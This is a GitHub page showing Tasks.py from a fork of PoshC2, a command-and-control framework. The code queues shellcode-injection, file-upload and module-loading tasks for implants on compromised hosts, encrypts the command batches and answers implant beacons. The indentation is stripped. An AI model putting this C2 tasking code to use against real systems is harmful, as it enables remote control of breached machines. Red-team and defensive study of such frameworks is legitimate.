forked from nettitude/PoshC2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathTasks.py
83 lines (81 loc) · 4.5 KB
/
Tasks.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
from Colours import Colours
from Core import load_module, load_module_sharp, encrypt, default_response
import DB, datetime, hashlib
def newTask(path):
result = DB.get_implants_all()
commands = ""
if result:
for i in result:
RandomURI = i[1]
EncKey = i[5]
tasks = DB.get_newtasks(RandomURI)
if RandomURI in path and tasks:
for a in tasks:
command = a[2]
user = a[3]
user_command = command
hostinfo = DB.get_hostinfo(RandomURI)
now = datetime.datetime.now()
if (command.lower().startswith("$shellcode64")) or (command.lower().startswith("$shellcode86") or command.lower().startswith("run-exe core.program core inject-shellcode")):
user_command = "Inject Shellcode: %s" % command[command.index("#") + 1:]
command = command[:command.index("#")]
elif (command.lower().startswith('upload-file')):
filepath = command.replace('upload-file', '')
if ";" in filepath:
filepath = filepath.split(";")[1].strip()
elif "estination" in filepath:
filepath = filepath.split('"')[1].strip()
else:
print(Colours.RED)
print("Error parsing upload command: %s" % filepath)
print(Colours.GREEN)
filehash = hashlib.md5(filepath.encode("utf-8")).hexdigest()
user_command = "Uploading file: %s with md5sum: %s" % (filepath, filehash)
taskId = DB.insert_task(RandomURI, user_command, user)
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
if len(str(taskId)) > 5:
raise ValueError('Task ID is greater than 5 characters which is not supported.')
print(Colours.YELLOW)
if user is not None and user != "":
print("Task %s (%s) issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, user, hostinfo[0], hostinfo[11], hostinfo[2], hostinfo[3], now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s issued against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, hostinfo[0], hostinfo[11], hostinfo[2], hostinfo[3], now.strftime("%d/%m/%Y %H:%M:%S")))
try:
print(user_command)
print(Colours.END)
except Exception as e:
print("Cannot print output: %s" % e)
if a[2].startswith("loadmodule"):
try:
module_name = (a[2]).replace("loadmodule ", "")
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print("Cannot find module, loadmodule is case sensitive!")
print(e)
command = taskIdStr + command
if commands:
commands += "!d-3dion@LD!-d" + command
else:
commands += command
DB.del_newtasks(str(a[0]))
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
responseVal = ""
print("Error encrypting value: %s" % e)
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
return responseVal
elif RandomURI in path and not tasks:
# if there is no tasks but its a normal beacon send 200
now = datetime.datetime.now()
DB.update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
return default_response()